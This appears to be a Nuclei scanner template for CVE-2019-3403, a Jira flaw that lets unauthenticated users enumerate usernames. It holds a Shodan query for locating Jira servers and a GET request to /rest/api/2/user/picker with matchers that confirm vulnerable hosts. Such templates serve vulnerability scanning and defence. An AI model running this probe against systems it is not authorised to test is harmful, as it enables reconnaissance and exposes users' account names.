id: CVE-2019-3403 info: name: User enumeration via an incorrect authorisation check author: Ganofins severity: medium description: The /rest/api/2/user/picker rest resource in Jira before version 7.13.3, from version 8.0.0 before version 8.0.4, and from version 8.1.0 before version 8.1.1 allows remote attackers to enumerate usernames via an incorrect authorisation check. reference: - https://jira.atlassian.com/browse/JRASERVER-69242 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N cvss-score: 5.3 cve-id: CVE-2019-3403 cwe-id: CWE-863 metadata: shodan-query: http.component:"Atlassian Jira" tags: cve,cve2019,atlassian,jira requests: - method: GET path: - "{{BaseURL}}/rest/api/2/user/picker?query=" matchers-condition: and matchers: - type: status status: - 200 - type: word words: - 'application/json' part: header - type: word words: - users - total - header condition: and